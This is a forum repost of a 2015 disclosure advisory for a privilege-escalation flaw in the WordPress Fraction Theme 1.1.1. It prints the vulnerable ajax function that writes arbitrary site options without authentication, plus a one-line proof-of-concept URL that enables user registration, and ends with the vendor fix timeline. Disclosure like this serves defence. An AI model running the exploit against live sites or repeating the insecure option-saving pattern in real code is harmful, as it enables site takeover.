Aerosol Posted March 10, 2015 Report Share Posted March 10, 2015 ------------------------------------------------------------------------------WordPress Fraction Theme 1.1.1 Previlage Escalation------------------------------------------------------------------------------[-] Theme Link:http://themeforest.net/item/fraction-multipurpose-news-magazine-theme/8655281[-] Affected Version:Version: 1.1.1[-] Vulnerability Description:This vulnerability allows an attacker to escalate privileges on the siteand have an admin account which may lead to a full site takeoverthe vulnerability is in /fraction-theme/functions/ajax.php there is thisfunction called "ot_save_options":function ot_save_options() { $fields = $_REQUEST; foreach($fields as $key => $field) { if($key!="action") { update_option($key,$field); } } die();}passing user input into the update_option function allows an attacker toupdate options like users_can_register,default_role.... etcthis can be accessed via ajax by users and non-users:add_action('wp_ajax_nopriv_ot_save_options', 'ot_save_options');add_action('wp_ajax_ot_save_options', 'ot_save_options');[-] Proof of Concept:this will enable user registrationhttp://localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1[-] Timeline:09 March - Vendor Notified09 March - Vendor Replied10 March - Fix Released10 March - Public Disclosure[-] References:http://research.evex.pw/?vuln=8 @evex_1337Source Quote Link to comment Share on other sites More sharing options...
